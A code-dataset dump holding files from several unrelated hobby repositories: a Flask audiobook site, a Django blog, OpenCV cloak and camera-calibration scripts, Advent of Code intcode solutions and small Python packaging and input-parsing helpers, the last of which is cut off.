"length_bytes": 1813,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 73,
"path": "/website/api.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, request, jsonify, session\nfrom werkzeug.utils import redirect\nfrom . import db\nfrom .helpers import apology, login_required\n\napi = Blueprint('api', __name__)\n\[email protected]('/transcript')\n@login_required\ndef transcript():\n id = request.args.get('v')\n\n from .packages.youtube_data_api import getVideoTranscript\n transcript = getVideoTranscript(id)\n\n return jsonify(transcript)\n\[email protected]('/save', methods=['POST'])\n@login_required\ndef save():\n user_id = session.get('user_id')\n data = request.get_json()\n\n if not data:\n return apology('Unable to save file')\n\n if not user_id:\n return redirect('/login')\n \n # check if book exist\n rows = db.execute('SELECT title FROM books WHERE id = ?', data['v_id'])\n if not len(rows):\n return apology('Book not found')\n\n db.execute('INSERT INTO saves (user_id, book_id) VALUES (? , ?)', user_id, data['v_id'])\n\n return redirect('/profile')\n\n\[email protected]('/unsave', methods=['POST'])\n@login_required\ndef unsave():\n user_id = session.get('user_id')\n data = request.get_json()\n\n if not data:\n return apology('Unable to unsave file')\n\n if not user_id:\n return redirect('/login')\n \n # delete from db\n db.execute('DELETE FROM saves WHERE book_id = ? AND user_id = ?;', data['v_id'], user_id)\n\n return jsonify({'success': 'Unsaved'})\n\n\[email protected]('/delete', methods=['POST'])\n@login_required\ndef delete():\n user_id = session.get('user_id')\n data = request.get_json()\n\n if not data:\n return apology('Unable to delete file')\n\n if not user_id:\n return redirect('/login')\n \n # delete from db\n db.execute('DELETE FROM books WHERE id = ? AND contributor_id = ?;', data['v_id'], user_id)\n\n return jsonify({'success': 'Deleted'})"
},
{
"alpha_fraction": 0.493865042924881,
"alphanum_fraction": 0.699386477470398,
"avg_line_length": 16.157894134521484,
"blob_id": "28342e48adf6310b3fb6c6d2e2753fdd0ea8f0e5",
"content_id": "d22e8a56694b66e0508c5b7d54d85cfa4102e4bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 326,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 19,
"path": "/requirements.txt",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "cachelib==0.2.0\ncertifi==2021.5.30\nchardet==4.0.0\nclick==8.0.1\ncolorama==0.4.4\nFlask==2.0.1\nFlask-Login==0.5.0\nFlask-Session==0.4.0\ngreenlet==1.1.0\ngunicorn==20.1.0\nidna==2.10\nitsdangerous==2.0.1\nJinja2==3.0.1\nMarkupSafe==2.0.1\nrequests==2.25.1\nSQLAlchemy==1.4.20\nurllib3==1.26.6\nWerkzeug==2.0.1\nyoutube-transcript-api==0.4.1\n"
},
{
"alpha_fraction": 0.6985294222831726,
"alphanum_fraction": 0.7022058963775635,
"avg_line_length": 29.33333396911621,
"blob_id": "8934e00081bf9f702595fe815fedfa9ee000a74b",
"content_id": "daab16b95d87322545b9a4ecaca7fbb53d328213",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 9,
"path": "/website/packages/youtube_data_api/__init__.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from youtube_transcript_api import YouTubeTranscriptApi\n\ndef getVideoTranscript(video_id):\n try:\n yt_transcript = YouTubeTranscriptApi.get_transcript(video_id)\n except: \n yt_transcript = [{'start': 0, 'text': 'No Transcript'}]\n\n return yt_transcript"
},
{
"alpha_fraction": 0.6251714825630188,
"alphanum_fraction": 0.6267147064208984,
"avg_line_length": 29.86243438720703,
"blob_id": "4ae386d39dab71e7ec065070f09e8804464abb64",
"content_id": "3a93dae80d0d7b2db16fc2c0f66d440a6b018459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5832,
"license_type": "no_license",
"max_line_length": 249,
"num_lines": 189,
"path": "/website/views.py",
"repo_name": "ralflopez/Audiobook50",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, render_template, session, request\nfrom werkzeug.utils import redirect\nfrom .helpers import login_required, apology\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom . import db\n\nviews = Blueprint('views', __name__)\n\n\[email protected]('/')\ndef index():\n # from .packages.youtube_data_api import getVideoTranscript\n\n return render_template('index.html')\n\n\[email protected]('/book')\ndef book_invalid():\n return redirect('/')\n\n\[email protected]('/catalogue')\n@login_required\ndef catalogue():\n book_list = db.execute('SELECT books.id, title, name as author, books.contributor_id as contributor_id FROM books JOIN authors ON authors.id = books.author_id ORDER BY title;')\n print(book_list)\n return render_template('catalogue.html', book_list=book_list, user_id=session.get('user_id'))\n\n\[email protected]('/book/<v_id>')\n@login_required\ndef book(v_id):\n rows = db.execute('SELECT books.id, title, name as author FROM books JOIN authors ON authors.id = books.author_id WHERE books.id = ?', v_id)\n \n # no book found\n if not len(rows):\n return apology('Book not found')\n\n book_details = rows[0]\n return render_template('book.html', book_details=book_details)\n\n\[email protected]('/contribute', methods=['GET', 'POST'])\n@login_required\ndef contribute():\n if request.method == 'POST':\n user_id = session.get('user_id')\n\n title = request.form.get('title')\n author = request.form.get('author')\n url = request.form.get('yt-url')\n\n if not title or not author or not url:\n return apology('Please complete info')\n\n # get id from url\n try:\n start = url.index('?v=') + 3\n except:\n return apology('Invalid URL')\n\n try:\n end = url.index('&')\n except:\n end = len(url)\n\n id = url[start: end]\n # get author\n author_id_res = db.execute('SELECT id FROM authors WHERE name LIKE ? LIMIT 1;', f'%{author}%')\n if not len(author_id_res):\n db.execute('INSERT INTO authors (name) VALUES (?);', author)\n author_id_res = db.execute('SELECT id FROM authors WHERE name = ? LIMIT 1;', author)\n\n author_id = author_id_res[0]['id']\n\n # push to db\n try:\n db.execute('INSERT INTO books (id, title, author_id, contributor_id) VALUES (?, ?, ?, ?);', id, title, author_id, user_id)\n except: \n return apology('Book already exist')\n\n return redirect('/catalogue')\n\n else:\n return render_template('contribute.html')\n\n\[email protected]('/profile')\n@login_required\ndef profile():\n user_id = session.get('user_id')\n\n saves_list = db.execute('SELECT books.id, books.title, authors.name AS author, books.contributor_id FROM saves JOIN books ON books.id = saves.book_id JOIN authors on authors.id = books.author_id WHERE saves.user_id = ? ORDER BY title;', user_id)\n\n contribution_list = db.execute('SELECT books.id, books.title, authors.name AS author, books.contributor_id FROM books JOIN authors ON books.author_id = authors.id WHERE books.contributor_id = ?;', user_id)\n \n return render_template('profile.html', saves_list=saves_list, contribution_list=contribution_list, user_id=user_id)\n\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n\n if session.get('user_id'):\n return redirect('/')\n\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\")\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\")\n\n # Query database for username\n rows = db.execute(\"SELECT * FROM users WHERE username = ?\", request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\")\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\[email protected](\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n\n if session.get('user_id'):\n return redirect('/')\n\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n username = request.form.get('username')\n password = request.form.get('password')\n confirmation = request.form.get('confirmation')\n\n # error handling\n if not username:\n return apology('Must Enter Username')\n\n if not password:\n return apology('Must Enter Password')\n\n if not confirmation:\n return apology('Must Enter Password For Confirmation')\n\n if password != confirmation:\n return apology('Password Confirmation Doesn\\'t Match')\n\n # check if exist\n user = db.execute('SELECT * FROM users WHERE username = ?', username)\n if len(user) != 0:\n return apology('User already exist. Try logging in instead')\n\n # insert into db\n db.execute('INSERT INTO users (username, hash) VALUES (?, ?)', username, generate_password_hash(password))\n\n return redirect('/login')\n\n # get request\n else:\n return render_template('register.html')\n\n\[email protected](\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")"
}
] | 10 |
mikhail/python-rightscale
|
https://github.com/mikhail/python-rightscale
|
aa859214f21210fb3ff6e1d9d7f5877fdfc14716
|
f6889a3e5e8139750f5e4da63cdb82c5f57e6811
|
9de5b2a08e8b1ff4e31d200046e54ed11cc5242a
|
refs/heads/master
| 2021-01-16T00:56:25.034743 | 2014-08-27T04:54:28 | 2014-08-27T04:54:28 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7051281929016113,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 18.5,
"blob_id": "e7495636a513014e53a58942736a5a903566dfb9",
"content_id": "a3a4ed93edf32362f1d6ac626c373c99c6a97ada",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 78,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 4,
"path": "/rightscale/__init__.py",
"repo_name": "mikhail/python-rightscale",
"src_encoding": "UTF-8",
"text": "from .rightscale import RightScale\nfrom .commands import *\n\nVERSION = '0.1.0'\n"
},
{
"alpha_fraction": 0.6628788113594055,
"alphanum_fraction": 0.6628788113594055,
"avg_line_length": 23,
"blob_id": "9e108026fe6b2e5203171b7b829d82cff622343a",
"content_id": "d0131d7924c3371f1f8edf7a1737c6ba9f93b513",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 22,
"path": "/setup.py",
"repo_name": "mikhail/python-rightscale",
"src_encoding": "UTF-8",
"text": "try:\n from setuptools import setup\nexcept:\n from distutils.core import setup\n\nfrom rightscale import VERSION\n\npackages = ['rightscale']\nrequires = ['requests']\n\n\nsetup(name='python-rightscale',\n version=VERSION,\n description='Python wrapper for the Rightscale API',\n author='Brent Naylor',\n author_email='[email protected]',\n license='MIT',\n package_dir={'rightscale': 'rightscale'},\n url='https://github.com/brantai/python-rightscale',\n packages=packages,\n install_requires=requires,\n )\n"
}
] | 2 |
tiffanyxiao/csc250-finalproject
|
https://github.com/tiffanyxiao/csc250-finalproject
|
ada60e56969b1cf721f68176dd6bd40f1e6cf4de
|
24e9cde347e265de168e0404ce3ff1bd49c41e03
|
2c2f5e5e46eaf48dcc17ab607c17ee5ca1aeb6f5
|
refs/heads/master
| 2020-05-16T07:41:09.849213 | 2019-04-30T13:27:28 | 2019-04-30T13:27:28 | 182,884,179 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5779467821121216,
"alphanum_fraction": 0.5836501717567444,
"avg_line_length": 16.53333282470703,
"blob_id": "554134a3e04712160d3c18d3eee3404b883b41ed",
"content_id": "a54258147d2a2860e7f58c39f76d95bf2e0032f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 526,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 30,
"path": "/test.py",
"repo_name": "tiffanyxiao/csc250-finalproject",
"src_encoding": "UTF-8",
"text": "import regex as re\nimport time\n\ndef match(test_str):\n regex_input = r'A(B|C+)+D'\n\n matches = re.finditer(regex_input, test_str)\n\n return matches\n\ndef printkey(matches):\n count = 0\n for match in matches:\n count +=1\n if count == 0:\n print(\"Match Not Found\")\n else:\n print(\"Match Found\")\n\ndef main():\n # time is in seconds\n start = time.time()\n text = input(\"Enter String to Match:\")\n key = match(text)\n end = time.time()\n printkey(key)\n print(end - start)\n\n\nmain()\n"
},
{
"alpha_fraction": 0.7349953651428223,
"alphanum_fraction": 0.7654662728309631,
"avg_line_length": 33.967742919921875,
"blob_id": "3925bcc5e4f26d01260a28722b3b1ca180b73e50",
"content_id": "717ae4dec13a02b7c95b013ee884fccb201c3cae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 276,
"num_lines": 31,
"path": "/README.md",
"repo_name": "tiffanyxiao/csc250-finalproject",
"src_encoding": "UTF-8",
"text": "# csc250 final project\nFinal Project on Evil Regular Expressions for CSC 250 - Theory of Computation.\n\nIncludes:\n\n-Python regular expression matcher with regex = A(B|C+)+D\n\n-Javascript regular expression matcher (with regex = A(B|C+)+D) and pseudo email signup authenticator. \n\n-Html file (index.html) featuring explanation of project and paper the project was based on\n\nSummary: \n\nThe project (described in the html file) is a presentation of a paper detailing what ReDos-ing is. There are also programs to demonstrate programs that are vulnerable to simple ReDos-ing attempts in this repository. See html file for a video demonstrating this vulnerability. \n\nTo launch: \n\n-the demo: open test.py and then click on \"sign up here\" to go to vulnerable password field. Enter in your attempts to break the webpage! \n\n-the presentation (web page version [the original presentation was in powerpoint form]): open index.html file. \n\nColor scheme: \n#0d0829 - black\n#091358 - dark blue\n#6882a1 - light blue \n#b60002 - red\n#690308 - dark red\n\n\nCo-authors: Gin Chen and Lorraine Lyu\nDemo code by Tiffany Xiao"
}
] | 2 |
chariskal/camera-calibration
|
https://github.com/chariskal/camera-calibration
|
acb96f538bc9b8b551358e91d4012e3029bedc66
|
64867cfae7036e8125a87fa541ebf372775d19c7
|
c34ea00bcc01129cdd4a3af69bf8aea6aa43bf36
|
refs/heads/main
| 2023-03-10T08:50:10.618653 | 2021-02-22T22:11:55 | 2021-02-22T22:11:55 | 341,349,408 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6631016135215759,
"alphanum_fraction": 0.6957813501358032,
"avg_line_length": 36.42222213745117,
"blob_id": "a16b6fff11d1974e59be51f75591e783ef6340d3",
"content_id": "40b2efc0298e69d8a51b7e2ffb3c78237cfcb45a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1683,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 45,
"path": "/camera_calibration.py",
"repo_name": "chariskal/camera-calibration",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\nimport os\nimport glob\n\n# Defining the dimensions of checkerboard\nCHECKERBOARD = (6,8)\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\nobjpoints = [] # vector that stores vectors of 3D points for each checkerboard image\nimgpoints = [] # vector that stores vectors of 2D points for each checkerboard image\n\n# Defining the world coordinates for 3D points\nobjp = np.zeros((1, CHECKERBOARD[0] * CHECKERBOARD[1], 3), np.float32)\nobjp[0,:,:2] = np.mgrid[0:CHECKERBOARD[0], 0:CHECKERBOARD[1]].T.reshape(-1, 2)\nprev_img_shape = None\n\nimages = glob.glob('./images/*.png') # Directory of checkboard images\n\nfor fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) # convert to grayscale\n # Find the chess board corners\n # If desired number of corners are found in the image then ret = true\n ret, corners = cv2.findChessboardCorners(gray, CHECKERBOARD, cv2.CALIB_CB_ADAPTIVE_THRESH + cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_NORMALIZE_IMAGE)\n\n if ret == True:\n objpoints.append(objp)\n # refining pixel coordinates for given 2d points.\n corners2 = cv2.cornerSubPix(gray, corners, (11,11),(-1,-1), criteria)\n imgpoints.append(corners2)\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, CHECKERBOARD, corners2, ret)\n \n #cv2.imshow('img',img)\n #cv2.waitKey(0)\n\ncv2.destroyAllWindows()\nh,w = img.shape[:2]\n\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\nfname = 'calibr_parameters.npz'\nnp.savez(fname, mtx=mtx, dist=dist)"
},
{
"alpha_fraction": 0.54923415184021,
"alphanum_fraction": 0.5638220310211182,
"avg_line_length": 27.5625,
"blob_id": "e242eb3ede77d0829a5799291634f3fa6149bb9d",
"content_id": "b19d6b1382327de91452bfda7cd856a2885fc8a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1371,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 48,
"path": "/test_calibration.py",
"repo_name": "chariskal/camera-calibration",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport os\nimport glob\nif __name__ == '__main__':\n filepath = 'video.flv'\n\n npzfile = np.load('calibr_parameters.npz')\n mtxstr, diststr = npzfile.files\n mtx = npzfile[mtxstr]\n dist = npzfile[diststr]\n\n\n cap = cv2.VideoCapture(filepath)\n if not cap.isOpened():\n print(\"VideoCapture failed...\")\n else:\n print(\"Video opened! ...\") \n fps = cap.get(cv2.CAP_PROP_FPS)\n print(\"FPS:\", fps)\n\n ret, frame = cap.read() # Read first frame to get info about the resolution\n h,w = frame.shape[:2]\n newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),0,(w,h))\n x,y,w,h = roi\n out = cv2.VideoWriter('undistorted.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 15, (w, h))\n\n dst = cv2.undistort(frame, mtx, dist, None, newcameramtx)\n dst = dst[y:y+h, x:x+w]\n out.write(dst)\n\n while cap.isOpened():\n ret, frame = cap.read()\n if np.shape(frame) == ():\n continue\n \n dst = cv2.undistort(frame, mtx, dist, None, newcameramtx)\n dst = dst[y:y+h, x:x+w]\n out.write(dst)\n #cv2.imshow(\"video\", dst)\n #k = cv2.waitKey(30) & 0xff # if 'Esc' is pressed then quit\n #if k == 27:\n # break\n\n cv2.destroyAllWindows()\n out.release()\n cap.release()\n"
},
{
"alpha_fraction": 0.8073089718818665,
"alphanum_fraction": 0.8073089718818665,
"avg_line_length": 49.16666793823242,
"blob_id": "b4d7eeffb971c9c569a3920fe61712c4aa1ce35f",
"content_id": "fd0ac07ca7806d32247fcb1da91d206490afa91b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 301,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/README.md",
"repo_name": "chariskal/camera-calibration",
"src_encoding": "UTF-8",
"text": "OpenCV python code for calibrating a camera (removing lens distortion).\nTested on an underwater BARLUS stainless steel camera\n\n\n\n\n"
}
] | 3 |
PalkeshGoyal/red-Cloak
|
https://github.com/PalkeshGoyal/red-Cloak
|
ec148a25c67952b5247fd9c032c143dbaecd0579
|
05ae5c94cf0e457692318d427240839bb6477c65
|
5ac7ca9b8d87dd8a99d023bb382de539f39185fb
|
refs/heads/master
| 2022-11-19T12:37:24.217141 | 2020-07-18T13:21:45 | 2020-07-18T13:21:45 | 280,659,236 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5529196858406067,
"alphanum_fraction": 0.614051103591919,
"avg_line_length": 30.84848403930664,
"blob_id": "9fe1c4a64f2df2ec2abb3244cb406d24babb6fee",
"content_id": "491dccf72965b439e2660c560830ddfd3ea04705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1096,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 33,
"path": "/cloak.py",
"repo_name": "PalkeshGoyal/red-Cloak",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport cv2 as cv\r\n#import time\r\ncap = cv.VideoCapture(0, cv.CAP_DSHOW)\r\nbackground = 0\r\nfor i in range(30):\r\n ret , background = cap.read()\r\nwhile(cap.isOpened()):\r\n ret , img = cap.read()\r\n if not ret:\r\n break\r\n hsv = cv.cvtColor(img , cv.COLOR_BGR2HSV)\r\n lower_red = np.array([0,120,70])\r\n upper_red = np.array([10,255,255])\r\n mask1 = cv.inRange(hsv,lower_red,upper_red)\r\n \r\n lower_red = np.array([170,120,70])\r\n upper_red = np.array([180,255,255])\r\n mask2 = cv.inRange(hsv,lower_red,upper_red)\r\n \r\n mask1 = mask1 + mask2\r\n mask1 = cv.morphologyEx(mask1,cv.MORPH_OPEN,np.ones((3,3)),iterations = 2)\r\n mask1 = cv.morphologyEx(mask1,cv.MORPH_DILATE,np.ones((3,3)),iterations = 1)\r\n mask2= cv.bitwise_not(mask1)\r\n res1= cv.bitwise_and(background, background, mask=mask1)\r\n res2=cv.bitwise_and(img,img,mask=mask2)\r\n final_output= cv.addWeighted(res1, 1, res2, 1,0)\r\n cv.imshow(\"Eureka\",final_output)\r\n k = cv.waitKey(10)\r\n if( k == 27 ):\r\n break\r\ncap.release()\r\ncv.destroyAllWindows()\r\n \r\n \r\n"
}
] | 1 |
rossacheson/advent-of-code
|
https://github.com/rossacheson/advent-of-code
|
9602531840629e34afb6611eae1bf16e262f2042
|
ec0a8a7e46c761ddaf3b5462f697d3ca380ed901
|
f0fd864bd1254ecda22f11396a2db8f932a1659a
|
refs/heads/main
| 2023-01-14T18:59:18.395070 | 2020-11-11T01:12:30 | 2020-11-11T01:12:30 | 304,620,881 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5435540080070496,
"alphanum_fraction": 0.5707316994667053,
"avg_line_length": 24.64285659790039,
"blob_id": "9576e48f75bdfb65a345835039d67e4e680a828a",
"content_id": "0b12f4c441a39b63c252977f6c3956cb49a76c51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1435,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 56,
"path": "/2019/2/2.py",
"repo_name": "rossacheson/advent-of-code",
"src_encoding": "UTF-8",
"text": "from typing import List\n\ninitial_memory: List[int]\nDESIRED_OUTPUT = 19690720\n\nwith open('2019/2/input.txt', mode='r') as file:\n input = file.read()\n initial_memory = [int(s) for s in input.split(',')]\n\n\ndef intcode_compute(noun:int, verb:int):\n program = initial_memory.copy()\n program[1] = noun\n program[2] = verb\n\n ## run the program on the intcode computer\n i = 0\n while True:\n result = -1\n opcode = program[i]\n if(opcode == 99):\n break\n elif(opcode == 1):\n result = program[program[i + 1]] + program[program[i + 2]]\n elif(opcode == 2):\n result = program[program[i + 1]] * program[program[i + 2]]\n\n try:\n program[program[i + 3]] = result\n except IndexError as e:\n print(e)\n\n i += 4\n\n return program[0]\n\n\ndef find_noun_verb_pair():\n for i in range(100):\n for j in range(100):\n result = intcode_compute(i, j)\n if(result == DESIRED_OUTPUT):\n return { 'noun': i, 'verb': j }\n\n\nnoun_verb_dict = find_noun_verb_pair()\n\nif(noun_verb_dict == None):\n raise Exception('Error: no combination resulted in the desired output of ' + DESIRED_OUTPUT)\n\nnoun = noun_verb_dict.get('noun', -1)\nverb = noun_verb_dict.get('verb', -1)\nprint('noun: ' + str(noun))\nprint('verb: ' + str(verb))\nfinal_answer = 100 * noun + verb\nprint('final answer: ' + str(final_answer))"
},
{
"alpha_fraction": 0.5461847186088562,
"alphanum_fraction": 0.6064257025718689,
"avg_line_length": 23.129032135009766,
"blob_id": "3eefa4e874f310fc8a9194dae1ce5cd81f43f7a8",
"content_id": "3a39e213ae63fa0eb4b11612af4e72739a973d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 31,
"path": "/2019/2/1.py",
"repo_name": "rossacheson/advent-of-code",
"src_encoding": "UTF-8",
"text": "from typing import List\n\nprogram: List[int]\n\nwith open('2019/2/input.txt', mode='r') as file:\n input = file.read()\n program = [int(s) for s in input.split(',')]\n\n## restore the gravity assist program to the \"1202 program alarm\" state\nprogram[1] = 12\nprogram[2] = 2\n\n## alternative test program\n# program = [int(s) for s in [1,9,10,3,2,3,11,0,99,30,40,50]]\n\n## run the program on the intcode computer\ni = 0\nwhile True:\n result = -1\n opcode = program[i]\n if(opcode == 99):\n break\n elif(opcode == 1):\n result = program[program[i + 1]] + program[program[i + 2]]\n elif(opcode == 2):\n result = program[program[i + 1]] * program[program[i + 2]]\n\n program[program[i + 3]] = result\n i += 4\n\nprint(program[0])"
}
] | 2 |
Anna-G11/Blog_Website_Django
|
https://github.com/Anna-G11/Blog_Website_Django
|
efea379495f9c6c07ad255d7f89d9e41f6fe1de3
|
58e90f67820ce931d4b0b7f6648724bb62c734ce
|
7c21a643f84cced460a5a99c6f839d51a2abdafc
|
refs/heads/master
| 2022-11-23T05:37:46.148414 | 2020-08-04T13:09:02 | 2020-08-04T13:09:02 | 284,979,451 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6844050288200378,
"alphanum_fraction": 0.6899482607841492,
"avg_line_length": 29.066667556762695,
"blob_id": "a29a03c88ccc04993ecc05001a0cc791f267b8c0",
"content_id": "757f5379b07432656a45732efdae7a3820d06c9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2706,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 90,
"path": "/Blog_website/BlogProject/Blogapp/views.py",
"repo_name": "Anna-G11/Blog_Website_Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render,get_object_or_404,redirect\nfrom django.utils import timezone\nfrom django.urls import reverse_lazy\nfrom Blogapp.models import Post,Comment\nfrom Blogapp.form import PostForm,CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import (TemplateView,ListView,DetailView,\n CreateView,UpdateView,DeleteView)\n\n# Create your views here.\nclass AboutView(TemplateView):\n template_name = 'about.html'\n\nclass PostListView(ListView):\n model = Post\n\n def get_queryset(self):\n return Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n template_name='post_list.html'\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'post_detail.html'\n\n\nclass CreatePostView(LoginRequiredMixin,CreateView):\n login_url='/login/'\n redirect_field_name = 'Blogapp:post_details'\n form_class = PostForm\n model = Post\n template_name = \"post_form.html\"\n\nclass PostUpdateView(LoginRequiredMixin,UpdateView):\n login_url='/login/'\n redirect_field_name = 'Blogapp:post_details'\n form_class = PostForm\n model = Post\n\nclass PostDeleteView(LoginRequiredMixin,DeleteView):\n model = Post\n success_url = reverse_lazy('Blogapp:post_list')\n\nclass DraftListView(LoginRequiredMixin,ListView):\n login_url='/login/'\n redirect_field_name = 'Blogapp:post_details'\n model = Post\n\n def get_queryset(self):\n return Post.objects.filter(published_date__isnull=True).order_by('create_date')\n template_name = \"post_draft_list.html\"\n\n\n#######################################Comment#####\n\n@login_required\ndef post_publish(request,pk):\n post = get_object_or_404(Post,pk=pk)\n post.publish\n return redirect('Blogapp:post_details',pk=pk)\n\n\n@login_required\ndef add_comment_to_post(request,pk):\n post = get_object_or_404(Post,pk=pk)\n if request.method =='POST':\n form = CommentForm()\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save()\n return render('post_detail.html',pk=post.pk)\n else:\n form = CommentForm()\n return render(request,'comment_form.html',{'form':form})\n\n\n\n@login_required\ndef comment_approved(request,pk):\n comment = get_object_or_404(Comment,pk=pk)\n comment.approve()\n return redirect('Blogapp:post_details',pk=comment.post.pk)\n\n@login_required\ndef comment_remove(request,pk):\n comment = get_object_or_404(Comment,pk=pk)\n post_pk= comment.post.pk\n comment.delete()\n return render('post_detail.html',pk= post_pk)\n"
}
] | 1 |
davvelsan/src-helpers
|
https://github.com/davvelsan/src-helpers
|
56df2fad64eb244c8e6564220f3e5415901e2fdd
|
85ab0f4e22964462dd95558e5a85fb94b625488b
|
f940bcedba2b7073fb21916a86c51baad3755ea9
|
refs/heads/master
| 2017-12-05T04:57:52.554681 | 2017-01-27T11:51:57 | 2017-01-27T11:51:57 | 55,233,302 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5892912149429321,
"alphanum_fraction": 0.5930052399635315,
"avg_line_length": 25.260162353515625,
"blob_id": "7d60d042172f8b95e804b9b4317c4d4ef4c2a436",
"content_id": "f3a648d878097fc5df36323aca5870b3d8b49979",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3231,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 123,
"path": "/_input.py",
"repo_name": "davvelsan/src-helpers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExposes methods to import various inputs into different structures.\n\n\"\"\"\n\nimport os, sys\nfrom collections import defaultdict\n\n\n# ========== IMPORT\n\ndef inputDict(data, sep, key = 0, n = (0,1), cast = list, mode = 'rdict'):\n \"\"\"\n Converts a variable input type to a python <dict>.\n\n :<string> data: path to file or standard input (denoted by '-')\n :<string> sep: field separator\n :<integer> key: element index to use for dictionary keys\n :<integer> n: value tuple size (start_index, count)\n :<type> cast: type object for values (e.g. list, set, tuple)\n :<string> mode: use nth element from each row (rdict) or column (cdict) as key\n\n :<dict> return: iterable dictionary with <cast> type values\n\n NOTES:\n - missing keys will return the default cast element <type>\n - if cast == <dict>, elements from the first row are used as keys for each subsequent line\n \"\"\"\n\n # data to list of lines\n lines = inputList(data, sep, n = n)\n\n # convert to list of columns\n if mode == 'cdict':\n lines = map(list, zip(*lines))\n\n # convert to a dictionary values are list of type(cast) elements\n d = defaultdict(list)\n if cast == dict:\n cast = lines.pop(0)\n for l in lines:\n d[l[key]].append(dict(zip(cast, l)))\n else:\n for l in lines:\n d[l[key]].append(cast(l))\n\n return d\n\ndef inputList(data, sep, n = (0,1), cast = list):\n \"\"\"\n Converts a tabular input type to an n-dimensional python LIST\n\n :<string> data: file path or standard input (denoted as '-')\n 